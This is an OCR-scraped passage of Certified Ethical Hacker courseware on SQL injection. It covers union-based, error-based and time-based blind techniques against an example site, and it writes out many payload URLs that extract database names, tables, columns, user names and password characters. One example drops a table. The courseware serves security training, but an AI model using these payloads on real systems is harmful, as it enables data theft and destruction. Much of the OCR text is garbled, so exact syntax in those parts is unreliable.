  52. 52. Ethical Hacking and Countermeasures SQL Injection Exam 312-50 Certified Ethical Hacker U nion SQL In jectio n E x a m p le Union SQL Injection ‫ ־‬Extract Union SQL Injection - Extract Database Name Database Tables http://juggyboy.com/page. aspx?id=l UNION SELECT ALL 1,DB_NAME,3,4— [D B_N AM E] http://juggyboy.com/page.aspx?id=l UNION SELECT ALL 1,name,3,4 from sysobjects where xtype=char(85)-- Returnedfrom theserver [EMPLOYEE_TABLE] Returnedfromtheserver Union SQL Injection ‫ ־‬Extract Table Union SQL Injection - Extract 1st Column Names Field Data http://juggyboy. com/page.aspx?id=l UNION SELECT ALL 1 ,column_name,3,4 from DB_NAME. information_schema.columns where table_name ='EMPLOYEE_TABLE'— h t t p :/ / j u g g y b o y .c o m / p a g e .aspx?id=l UNION SELECT ALL 1,COLUMN-NAME1,3,4 from EMPLOYEE_NAME — [EM PLOYEE_NAME] [FIELD 1 VALUE] Returnedfrom theserver Copyright © by EG-G*ancil. All Rights Reserved. Reproduction is Strictly Prohibited. Union SQL Injection Example UNION SQL injection is used when the user uses the UNION command. The user checks for the vulnerability by adding a tick to the end of a ".php? id=" file. If it comes back with a MySQL error, the site is most likely vulnerable to UNION SQL injection. They proceed to use ORDER BY to find the columns, and at the end, they use the UNION ALL SELECT command. Extract Database Name This is the example of union SQL injection in which an attacker tries to extract a database name, h t t p :/ / ju gg yb oy. com/page. asp x ?id = l UNION SELECT ALL 1 ,DB_NAME,3,4-[DB_NAME] Returned from the server Extract Database Tables This is the example of union SQL injection that an attacker uses to rxtract database tables. h t t p :/ / ju gg yb oy. com/page. asp x ?id = l s y s o b je c ts where x typ e= ch ar(85)-- UNION SELECT ALL 1 ,name,3,4 from [EMPLOYEE_TABLE] Returned from the server. Extract Table Column Names This is the example of union SQL injection that an attacker uses to extract table column names. Module 14 Page 2037 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  53. 53. Ethical Hacking and Countermeasures SQL Injection Exam 312-50 Certified Ethical Hacker h t t p :/ / ju gg yb oy. com/page. asp x ?id = l UNION SELECT ALL 1, column name, 3, 4 from DB_NAME. in fo rm a tio n _ schema. Columns where t a b le _ name = 'EMPLOYEE_TABLE'-[EMPLOYEE_NAM E] Extract 1st Field Data This is the example of union SQL injection that an attacker uses to extract field data. h t t p : //ju g g yb o y. com/page. asp x ?id = l UNION from EMPLOYEE_NAME -- SELECT ALL 1, COLUMN-NAME-1, 3, 4 [FIELD 1 VALUE] Returned from the server Module 14 Page 2038 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  54. 54. Ethical Hacking and Countermeasures SQL Injection Exam 312-50 Certified Ethical Hacker SQL Injection Error Based Extra ct Database Name w http://juggyboy.com/page.aspx?id= 1 or l=convert(int,(DB_NAME))— a Syntax error converting the nvarchar value 1 [DB NAME]' to a column of data type int. CEH tilled IUkJ M M m* Extra ct 1st Database Table t http://juggyboy.com/page.aspx?id=l t or l=convert(int,(select top 1 name from sysobjects where xtype=char (8 5 )))— ‫ ט‬Syntax error converting the nvarchar value ,[TABLE NAME 1]' to a column of data type int. Extra ct 1st Table Colum n Name t http://juggyboy.com/page.aspx?id=l or t l=convert(int, (select top 1 column_name from DBNAME.information_schema.columns where table_name=' TABLE-NAME-1'))— » Extra ct 1st Field of 1st Row (Data) » http://juggyboy.com/page.aspx?id=l or l=convert(int, (select top 1 COLUMN-NAME-1 from TABLE-NAME-1))w Syntax error converting the nvarchar value '[FIELD 1 VALUE]' to a column of data type int. Syntax error converting the nvarchar value ,[COLUMN NAME 1]' to a column of data type int. Copyright © by IG-GOHCil. All Rights Reserved. Reproduction is Strictly Prohibited. SQL Injection Error Based The attacker makes use of the database-level error messages disclosed by an application. This is very useful to build a vulnerability exploit request. There are even chances of automated exploits based on the different error messages generated by the database server. Extract Database Name The following is the code to extract database name through SQL injection error-based method: h t t p :/ / ju g g yb oy. com/page. asp x ?id = l o r l= c o n v e r t ( in t , (DB_NAME)) — Syntax error converting the nvarchar value '[DB NAME]' to a column of data type int. Extract 1st Table Column Name The following is the code to extract the first table column name through the SQL injection errorbased method: h t t p :/ / ju g g yb oy. com/page. asp x ?id = l o r l= c o n v e r t ( in t , ( s e le c t column_name from DBNAME. in fo rm atio n _sch em a. columns table_nam e=1 TABLE-NAME-1' ) ) Syntax error converting the nvarchar value top 1 where '[COLUMN NAME 1]' to a column of data type int. Extract 1st Database Table Module 14 Page 2039 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  55. 55. Ethical Hacking and Countermeasures SQL Injection Exam 312-50 Certified Ethical Hacker The following is the code to extract the first database table through the SQL injection errorbased method: h t t p :/ / ju g g yb oy. com/page. asp x ?id = l o r l= c o n v e r t ( in t , from s y s o b je c ts where x typ e= ch ar( 8 5 ) ) ) — ( s e le c t top 1 name Syntax error converting the nvarchar value '[TABLE NAME 1]' to a column of data type int. Extract 1st Field Of 1st Row (Data) The following is the code to extract the first field of the first row (data) through the SQL injection error-based method: h t t p :/ / ju g g yb oy. com/page. asp x ?id = l COLUMN-NAME -1 from TABLE-NAME-1) ) — Syntax error converting the nvarchar value Module 14 Page 2040 or l= c o n v e r t ( in t , ( s e le c t top 1 '[FIELD 1 VALUE]' to a column of data type int. Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  56. 56. Ethical Hacking and Countermeasures SQL Injection Exam 312-50 Certified Ethical Hacker M odule Flow CEH U rtifM IthKJi lUch•( Copyright © by EG-GtODCil. All Rights Reserved. Reproduction is Strictly Prohibited. M odule Flow Previously we discussed various types of SQL injection attacks. Now, we will discuss each type of SQL injection attack in detail. Let us begin with the blind SQL injection attack. Blind SQL injection is a method that is implemented by the attacker when any server responds with any error message stating that the syntax is incorrect. (v W SQL Injection Concepts ^ 1* 0 Testing for SQL Injection SQL Injection Tools ') Types of SQL Injection (^q—1j Blind SQL Injection - Advanced SQL Injection ^— Evasion Techniques Countermeasures V‫- ׳‬ SQL Injection Methodology Module 14 Page 2041 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  57. 57. Ethical Hacking and Countermeasures SQL Injection Exam 312-50 Certified Ethical Hacker This section introduces and gives a detailed explanation of blind SQL injection attacks. Module 14 Page 2042 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  58. 58. Ethical Hacking and Countermeasures SQL Injection Exam 312-50 Certified Ethical Hacker W hat I s B lin d SQL In je c tio n ? CEH Copyright © by EC-ClllCil. All Rights Reserved. Reproduction Is Strictly Prohibited. What Is Blind SQL Injection? Blind SQL injection is used when a web application is vulnerable to SQL injection. In many aspects, SQL injection and blind injection are same, but there are slight differences. SQL injection depends on error messages but blind injections are not dependent on error messages. W here ever there is web application vulnerability, blind SQL injection can be used to either access the sensitive data or to destroy the data. Attackers can steal the data by asking a series of true or false questions through SQL statements. Results of the injection are not visible to the attacker. This is also more time consuming because every time a new bit is recovered, then a new statement has to be generated. Module 14 Page 2043 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  59. 59. Ethical Hacking and Countermeasures SQL Injection Exam 312-50 Certified Ethical Hacker No Error Messages Returned ln this attack, when the attacker tries to perform SQL injection using a query such as: "I JuggyBoy'; drop table Orders - ", to this statement, the server throws an error message with a detailed explanation of the error with database drivers and ODBC SQL server details in simple SQL injection; however, in blind SQL injection, the error message is thrown to just say that there is an error and the request was unsuccessful without any d e ta ils .( JuggyBoy' drop table Orders -‫־‬ ; Blind SQL Injection (Attack Successful) Simple SQL Injection M ic r o s o f t OLE DB P r o v id e r f o r ODBC D r iv e r • • r r o r '8 00 4 0*14 ‫־‬ (M ic r o s o f t ) [COBC SQL S e r v e r D r iv e r J (SQL S e r v e r ](Jn o lo s e d q u o t a t io n ■ ark b e fo r e th e c h a ra a te r s trin g * '. / s h o p p in g / b u y . a s p x , l i n e 52 F IG U R E 14.13: No Error M essages R eturned Module 14 Page 2044 Ethical Hacking and Countermeasures Copyright © by EC-C0l1nCil All Rights Reserved. Reproduction is Strictly Prohibited.
  60. 60. Ethical Hacking and Countermeasures SQL Injection Exam 312-50 Certified Ethical Hacker Blind SQL Injection: WAITFOR DELAY YES or NO Response ; I F EXISTS (SELECT * FROM creditcaxd) WAITFOR DELAY '0:0 :1 0 *— Copyright © by EG-GWHICil. All Rights Reserved. Reproduction is Strictly Prohibited. Blind SQL Injection: W A ITFO R DELAY YES or NO Response Step 1:; IF EXISTS(SELECT * FROM creditcard) WAITFOR DELAY '0:0:10'Step 2: Check if database "creditcard" exists or not Step 3: If No, it displays "W e are unable to process your request. Please try back later". Step 4: If YES, sleep for 10 seconds. After 10 seconds displays "W e are unable to process your request. Please try back later". Since no error messages are returned, use the 'waitfor delay' command to check the SQL execution status W A IT FOR DELAY ,time' (Seconds) This is just like sleep; wait for a specified time. The CPU is a safe way to make a database wait. WAITFOR DELAY '0 :0 :1 0 '- BENCHMARK() (Minutes) This command runs on MySQL Server. BENCHMARK(howmanytimes, do t h is ) Module 14 Page 2045 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  61. 61. Ethical Hacking and Countermeasures SQL Injection Exam 312-50 Certified Ethical Hacker ©OG0 ; IF EXISTS (SELECT * FROM creditcard) WAITFQR DELAY '0:0:10'— Oops! W e are unable to process your request. Please try back later. Since no error messages are returned, use ,w a i t f o r d e l a y ' command to check the SQL execution status Oops! W e are unable to process your request. Please try back later. FIGURE 14.14: WAITFOR DELAY YES or NO Response Module 14 Page 2046 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  62. 62. Ethical Hacking and Countermeasures SQL Injection Exam 312-50 Certified Ethical Hacker Blind SQL Injection Exploitation (MySQL) r c1 1 ™~ 5 Searching for the first character of the first table entry /?id=l+AND+555=if(ord(mid((select+pass+from Searching for the second character of the first table entry users+limit+0 ,1) ,1,1) )= [971,555,777) /?id=l+AND+555=if(ord(mid((select+pass from+users+limit+O, 1 ) , 2 , 1))= [9 7 1 5 5 5 ,777) If the table "users" contains a column "pass" and the first character of the first entry in this column is 97 (letter "a"), then If the table "users" contains a column "pass" and the second character of the first entry in this column is 97 DBMS will return TRUE; otherwise, FALSE. (letter « a » ), then DBMS will return TRUE; otherwise, FALSE. Copyright © by EG-G*ancil. All Rights Reserved. Reproduction is Strictly Prohibited. Blind SQL Injection ‫ ־‬Exploitation (MySQL) SQL injection exploitation depends on the language used in SQL. An attacker merges two SQL queries to get more data. The attacker tries to exploit the Union operator to easily get more information from the databaase management system. Blind injections help an attacker to bypass more filters easily. One of the main differences in blind SQL injection is entries are read symbol by symbol. Searching for the first character of the first table entry / ?id=l+AND+555=if(ord(m id( (select+ pass+ from 97.555.777) u s e rs+ lim it+ 0 ,1 ) ,1 , 1 )) = If the table "users" contains a column "pass" and the first character of the first entry in this column is 97 (letter "a"), then DBMS can return TRUE; otherwise, FALSE. Searching for the second character of the first table entry / ?id=l+AND+555=if(ord(m id( (sele ct+ p a ss 97.555.777) from +users+lim it+O,1 ) ,2 , 1 )) = If the table "users" contains a column "pass" and the second character of the first entry in this column is 97 (letter «a»), then DBMS can return TRUE; otherwise, FALSE. Module 14 Page 2047 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  63. 63. Ethical Hacking and Countermeasures SQL Injection Exam 312-50 Certified Ethical Hacker Blind SQL Injection - Extract D atabase User CEH Finding a full user name of 8 characters using binary search method takes 56 requests Check for username length h t t p : / / j u g g y b o y . c o m / p a g e .a s p x ? id = l; I F (L E N (U S E R )=1) WAITFOR DELAY '0 0 : 0 0 :1 0 ‫י‬ h t t p :/ / ju g g y b o y . c o m / p a g e .a s p x ? id = l; I F (L E N (U S E R )= 2 ) WAITFOR DELAY '0 0 :0 0 :1 0 • h t t p :/ / ju g g y b o y . c o m / p a g e .a s p x ? id = l; I F (L E N (U S E R )=3) WAITFOR DELAY '0 0 : 0 0 :1 0 ' 17 ‫נ‬ Check if 1st character in username contains 'A' (a=97), 'B', or ,C etc. h t tp :/ / ju g g y b o y .c o m / p a g e .a s p x ?id = l; I F ( A S C I I(lo w e r (s u b s t r in g ((U S E R ),1 ,1 )))= 9 7 ) WAITFOR DELAY '0 0 :0 0 :1 0 ' h t tp :/ / ju g g y b o y .c o m / p a g e .a s p x ?id = l; I F ( A S C I I(lo w e r (s u b s t r in g ((U S E R ),1 ,1 )))= 9 8 ) WAITFOR DELAY '0 0 :0 0 :1 0 ' h ttp :/ / ju g g y b o y .c o m / p a g e .a s p x ?id = l; I F ( A S C I I(lo w e r (s u b s t r in g ((U S E R ),1 ,1 )))= 9 9 ) WAITFOR DELAY '0 0 :0 0 :1 0 ' Check if 2n character in username contains ‫׳‬A' (a=97), 'B', or *C etc. d h ttp :/ / ju g g y b o y .c o m / p a g e .a s p x ?id - l; I F ( A S C I I(lo w e r (s u b s t r in g ((U S E R ), 2 , 1 ) ) ) - 9 7 ) WAITFOR DELAY '0 0 :0 0 :1 0 ' h ttp :/ / ju g g y b o y .c o m / p a g e .a s p x 7 id - l; I F ( A S C I I(lo w e r (s u b s t r in g ((U S E R ), 2 , 1 ) ) ) - 9 8 ) WAITFOR DELAY '0 0 :0 0 :1 0 ' h ttp :/ / ju g g y b o y .c o m / p a g e .a s p x 9 id - l; I F ( A S C I I (lo w e r (s u b s t r in g ((U S E R ), 2 , 1 ) ) ) - 9 9 ) WAITFOR DELAY '0 0 :0 0 :1 0 ' Check if 3rd character in username contains 'A' (a=97), 'B 1 or 'C etc. , h ttp :/ / ju g g y b o y .c o m / p a g e .a s p x ?id = l; I F ( A S C I I(lo w e r (s u b s t r in g ((U S E R ),3 ,1 )))= 9 7 ) WAITFOR DELAY '0 0 :0 0 :1 0 ' h ttp :/ / ju g g y b o y .c o m / p a g e .a s p x ?id = l; I F ( A S C I I(lo w e r (s u b s t r in g ((U S E R ),3 ,1 )))= 9 8 ) WAITFOR DELAY '0 0 :0 0 :1 0 ' h ttp :/ / ju g g y b o y .c o m / p a g e .a s p x ?id = l; I F ( A S C I I(lo w e r (s u b s t r in g ((U S E R ),3 ,1 )))= 9 9 ) WAITFOR DELAY '0 0 :0 0 :1 0 ' Copyright © by EG-G*ancil. All Rights Reserved. Reproduction Is Strictly Prohibited. Blind SQL Injection ‫ ־‬Extract Database User In the blind SQL injection method, the attacker can extract the database user name. The attacker can probe yes/no questions from the database server to extract information from it. To find the first letter of a user name with a binary search, it takes 7 requests and for 8 char long name it takes 56 requests. Module 14 Page 2048 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  64. 64. Ethical Hacking and Countermeasures SQL Injection Exam 312-50 Certified Ethical Hacker Finding a full username of 8 characters using binary search method takes 56 requests Check for username length http://juggyboy.com/page.aspx?id=l; IF (LEN(USER)=1) WAITFOR DELAY '00:00:10'— http://juggyboy.com/page.aspx?id=l; IF (LEN(USER)=2) WAITFOR DELAY '00:00:10'— http://juggyboy.com/page.aspx?id=l; IF (LEN(USER)=3) WAITFOR DELAY '00:00:10'— Check if 1st character in usernam e contains ,a 1(a=97), !b or ,c1etc. http://juggyboy.con/page.aspx?id=l; IF (ASCII(lower(substring((USER),1,1)))=97) WAITFOR DELAY '00:00:10' http://juggyboy.con/page.aspx?id=l; IF (ASCII(lower(substring((USER),1,1)))=98) WAITFOR DELAY '00:00:10' http://juggyboy.con/page.aspx?id=l; IF (ASCII(lower(substring((USER),1,1)))=99) WAITFOR DELAY '00:00:10' Check if 2n character in username contains 1 (3=97), ,b', or ,c1 etc. d a1 http://juggyboy.con/page.aspx?id=l; IF (ASCII(lower(substring((USER),2,1)))=97) WAITFOR DELAY '00:00:10 ‫־‬ http://juggyboy.con/page.aspx?id=l; IF (ASCII(lower(substring((USER),2,1)))-98) WAITFOR DELAY ’00:00:10' http://juggyboy.con/page.aspx?id=l; IF (ASCII(lower(substring((USER),2,1)))=99) WAITFOR DELAY '00:00:10' Check if 3rd character in usernam e contains ,a 1(a=97), ,b', or ,c1etc. http://juggyboy.con/page.aspx?id=l; IF (ASCII(lower(substring((USER),3,1)))=97) WAITFOR DELAY 00:00:10‫'־‬ http://juggyboy.con/page.aspx?id=l; IF (ASCII(lower(substring((USER),3,1)))=98) WAITFOR DELAY '00:00:10' http://juggyboy.con/page.aspx?id=l; IF (ASCII(lower(substring((USER),3,1)))=99) WAITFOR DELAY '00:00:10' FIGURE 14.15: Extract Database User Module 14 Page 2049 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  65. 65. Ethical Hacking and Countermeasures SQL Injection Exam 312-50 Certified Ethical Hacker Blind SQL Injection - Extract D atabase N am e CEH C h eck fo r D a ta b a s e N a m e Length and N a m e http://juggyboy.com/page.aspx?id=l; I F (LEN(DB_NAME())=4) WAITFOR DELAY 00: 00: 10‫— '־‬ h t t p ://juggyboy.com/page.aspx?id= l; I F (A SC II(lo w e r(s u b strin g ( (DB_NAME()),1 ,1 )))= 9 7 ) http://juggyboy.com/page.aspx?id=l; I F (ASCII(lower(substring((DB_NAM E()),2 ,1 )))= 9 8 ) WAITFOR DELAY '00:00:10‫י‬ h t t p ://juggyboy.com/page.aspx?id= l; I F (ASCII(lower(substring((DB_NAM E()),3 ,1 )))= 9 9 ) WAITFOR DELAY '00:00:10' h t t p ://juggyboy.com/page.aspx?id= l; I F (A SC II(lo w e r(s u b strin g ( (DB_NAME( ) ) , 4 , 1 ) ) ) =100) WAITFOR DELAY '00:00:10‫י‬ WAITFOR DELAY '00:00:10‫י‬ Database Name = ABCD http://juggyboy. com/page. aspx?id-l; WAITFOR DELAY ' 0 0 : 0 0 : 1 0 ' — http://juggyboy.com/page.aspx7id-l; xtype-char(85)),1,1)))-101) WAITFOR http://juggyboy.com/page.aspx7id-l; xtype-char(85)), 2 , 1 ) ))-109) WAITFOR http://juggyboy.com/page.aspx7id-l; xtype-char(85)),3,1)))=112) WAITFOR IF (LEN(SELECT TOP 1 NAME from sysobjects where xtype-1 ')3‫)״‬ U IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where DELAY '00:00:10'-IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where DELAY ' 0 0 : 0 0 : 1 0 '- IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where DELAY '00:00:10'— Table Name = EM P Copyright © by EG-G*ancil. All Rights Reserved. Reproduction Is Strictly Prohibited. ^ Blind SQL Injection ‫ ־‬Extract Database Nam e In the blind SQL injection method, the attacker can extract the aatabase name using the time-based blind SQL injection method. Here, the attacker can brute force the database name by using time before the execution of the query and set the time after query execution; then he or she can assess from the result that if the time lapse is 10 seconds, then the name can be 'A‫;׳‬ otherwise, if it took 2 seconds, then it can't be 'A'. Module 14 Page 2050 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  66. 66. Ethical Hacking and Countermeasures SQL Injection Exam 312-50 Certified Ethical Hacker Check for Database Name Length and Name h t t p : //juggyboy . com/page . aspx?id=l ; I F (LEN (DB_NAME () )=4) WAITFOR DELAY '00:00:10' — h t t p : //juggyboy.com/page. asp x?id= l; I F (A S C II(lo w e r(s u b s trin g ( (DB_NAME( ) ) , 1 , 1 ) ) )=97) h t t p :// juggyboy. cocn/page. asp x ?id= l; I F (A SCII (lower (su bstring ( (DBNAME ( ) ) ,2 , 1 ) ) ) =98) WAITFOR DELAY '00:00:10‫— ״‬ h t t p : //juggyboy.com/page.asp x?id= l; I F (A S C II(lo w e r(s u b s trin g ( (DB_NAME( ) ) , 3 , 1 ) ) ) =99) WAITFOR DELAY '0 0 :0 0 :1 0 '— http://juggyboy.com /page.aspx?id=l; I F (A S C II(lo w e r(s u b s trin g ( (DBNAME( ) ) , 4 , 1 ) ) ) =100) WAITFOR DELAY '0 0 :0 0 :1 0 '— WAITFOR DELAY '0 0 :0 0 :1 0 '— Database Name = ABCD Extract 1st Database Table http://juggyboy.com/page. aspx?id=l; WAITFOR DELAY '00:00:10'— http://juggyboy. com/page. aspx?id=l; xtype=char (85)) ,1,1)) )=101) WAITFOR http://juggyboy.com/page. aspx?id=l; xtype=char(85)),2,1)))=109) WAITFOR http://juggyboy. com/page. aspx?id=l; xtype=ahar(85)),3,1)))=11?) WAITFOR IF (LEN(SELECT TOP 1 NAME from sysobjects where xtype=' ' =3) U ) IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjeats where DELAY '00:00:10' — IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjeats where DELAY '00:00:10' — IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjeats where DELAY '00:00:10‫י‬ — Table Name = EMP F IG U R E 14.16: Extract D atabase N am e Module 14 Page 2051 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  67. 67. Ethical Hacking and Countermeasures SQL Injection Exam 312-50 Certified Ethical Hacker Blind SQL Injection - Extract Colum n N am e C EH E x tra ct 1st T ab le C o lu m n N a m e h t t p :/ / juggyboy.com/page.asp x ?id = l; I F (LEN(SELECT TOP 1 column name from ABCD. info rm atio n schema. columns where table_name= ‫י‬EMP')=3) WAITFOR DELAY '00:00:10' — h t t p :/ / juggyboy.com/page.asp x ?id = l; I F (A S C II(lo w e r(s u b s trin g ( (SELECT TOP 1 column_name from ABCD. inform ation_schem a. columns where table_name=' EMP' ) , 1 , 1 ) ) ) =101) WAITFOR DELAY '0 0 :0 0 :1 0 '— h t t p :/ / juggyboy.com/page.asp x ?id = l; I F (A S C II(lo w e r(s u b s trin g ( (SELECT TOP 1 column_name from ABCD.inform ation_schem a.columns where table_name='EMP' ) , 2 , 1 ) ) ) =105) WAITFOR DELAY '0 0 :0 0 :1 0 '— h t t p :/ / juggyboy.com/page.asp x ?id = l/ I F (A S C II(lo w e r(s u b s trin g ( (SELECT TOP 1 column_name from ABCD.inform ation_schem a.columns where table_name=*EMP' ) , 3 , 1 ) ) ) =100) WAITFOR DELAY '00:00:10'-- Column Name = EID — m i 1 1 1 1 1 1 1 1 1 1 1 1 1111 E x tra ct 2nd Table C o lu m n N a m e http ://juggyboy. com/page, aspx? id-1; IF (LEN (SELECT TOP 1 column_name from ABCD. in f ormation_schema. columns where table_name-' EMP' and column_name>' EID 4- (‫ ) י‬WAITFOR DELAY '00:00:10•— http://juggyboy.com/page.aspx7id-l; IF (A SC II(low er(substring( (SELECT TOP 1 column_name from ABCD.information_schema.columns where table_name-' EMP' and column_name>' EID ' ) , 1 , 1 ) ) )-100) WAITFOR DELAY '00:00:10'http://juggyboy.com/page.aspx7id-l; IF (A SC II(low er(substring( (SELECT TOP 1 column_name from ABCD.information_schema.columns where table_name=' EMP' and column_name>' EID ' ) , 2 , 1 ) ) ) -101) WAITFOR DELAY '00:00:10'http://juggyboy.com/page.aspx?id=l; IF (A SC II(low er(substring( (SELECT TOP 1 column_name from ABCD.information_schema.columns where table_name=' EMP' and column_name>' EID ' ) , 3 , 1 ) ) )=112) WAITFOR DELAY '00:00:10'http://juggyboy.com/page.aspx?id=l; IF (A SC II(low er(substring( (SELECT TOP 1 column_name from ABCD.information_schema.columns where table_name=' EMP' and column_name>' EID ' ) , 4 , 1 ) ) ) =116) WAITFOR DELAY '00:00:10'- Column Name = DEPT Copyright © by EG-G*ancil. All Rights Reserved. Reproduction Is Strictly Prohibited. Blind SQL Injection ‫ ־‬Extract Column Nam e In the blind SQL injection method, the attacker can extract the column names using different brute force methods or tools using which he or she can check for the first table column name and the second table column name. Extract 1st Table Column Name h t tp :/ / ju g g y b o y .coct/page . aspx‫ ־‬id - l * I F (LEN(SELECT TOP 1 co lu s ‫־‬r . _ r . f r o n whore t a b le name- ‫ י‬EM I'‫ - ) י‬J ) MA1TFOR DELAY ■00:00:10 ABCD. in fo r m a tio n _ 9 c h e n a . colu m n s h t tp :/ / ju g g y b o y . co«/p»g• 1 1 p x ?1 d s l: 1r (A S C II (lo v e r ( s u b s t r in g ( (SELECT TOP 1 e o lim n name from ABCD. in forma t io : _schw»n‫ ״‬c o lu m n s where ta b le _ n a !r « « ' E M P ') , 1 , 1 ) ) )■101) WAIYFOR DELAY '00 0 0 :1 0 ' — * 1 h ttp :/ / ju g g y b o y .c o n / p a g e .asp x ?id - 1 . I F (A S C II(lo w e r (s u b s tr in g ((S E L E C T TOP 1 colunn_nane from ABCD. inform ataon_scheraa. columns where ta b le_r.am e -'E M P') ,2 ,1 )) )-105) WAITFOR DELAY ‫- י 01 :00 :00 י‬h ttp :/ / ju g g y b o y .c o re / p a g e .a s p x ? ld = l; I F (A S C II(lo w e r (s u b s tr in g ((S E L E C T TOP 1 column nano from A B C D .in fo rm atio n _B c h an a.columns where table_ram e= ' EM P ') , 3 , 1 ) ) )■100) WA1TFOR DELAY '0 0 :0 0 :1 0 '- - Column Name =EID Extract 2nd Table Column Name h te p ://j u g g y b o y .c a a /p a g e .& £ p x ? 3 .d = l; I F (1-EN | SELECT TCS 1 c o l a n r . i x e f r c n ABCD. i n f o r a a t i s r . s c h a i u . colum ns x k e re t a b l e _ ‫ ״‬a n e - ‫־‬EMP’ a n d c o lu n n _ n a n s> EID 4- ( ‫ ־‬KATTrOP DELAY '0 0 : 0 0 7 1 0 '- ) h t t p : / / j u g g y b o y • 0 c « /p « g * .a « p x '>1.*Bl r I F (ASCI I ( lo w e r ( s u b s t r i n g ( (SKLECT TOP 1 eolumn_nacr* from ABCD. i n f o r a a tio n _ 3 c h c a a . c o l us® ‫ ב‬w h ere ta b lc _ n m r^ ■ ‫ ־‬EH? ‫ * ־‬a d c o 1 w _ 3 c o k > ' E IS ' ) , 1 ,1 ) ) ) ■100) WAITTOR h t t p : / / J u g g y b o y .c c a / p a g e . a s p x ‫ ־‬d E i ; i f (ASCII (lo w e r ( s u b s t r i n g ( (SELECT TOP l colux» _n<*r« f r o n >l A B C D .in fo z tta tio n s c h s a a .c o lu a m • w h ere t a b l e m m - ' EMP‫ ־‬a nd ‫־. . •»* .« ־‬ >a*e> EID 101- ( ( (2 , 1 , (‫ )־‬WAITFOR h t t p : / / j u g g y b o y . c o n / p a g e . a s p x * i d - l ; 2F ( A S C I I ( lo w e r ( s u b s tr in g ( (SELECT TOP 1 c o lu n ! >«x« from ABC□, i n f o n r j t i o n e rh o n a e o l u m i w h ere t a b l e nw e=E N S >' and ‫ . ־ ־‬i n r n a a e V E I ' ) , 3 , 1 )7 ) =i 12) WAITFOR h t t p ! / / j u g g y b o y . a a n /p a g e . a s p x ? d = l .* I F (ASCII (lo w e r ( s u b s tr .rv g ( (SELECT TOP 1 colum n nacce f r o n ABCD. in f o r m a tl o n _ s c h e a a . c o lu n n s w here ta b le _ n a & e > ‫־‬EMP' a nd colu*r_r»a»e>• EID ) ,4 , 1) ) )■116) WAITFOR 1 1 1 DELAY '0 0 : 0 0 : 1 0 '- DELAY 0 0 : 0 0 : 1 0 '- - DELAY 0 0 :0 0 :1 0 • - - DELAY 0 0 : 0 0 : 1 0 '- - Column Name = DEPT FIGURE 14.17: Extract Database User Module 14 Page 2052 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

×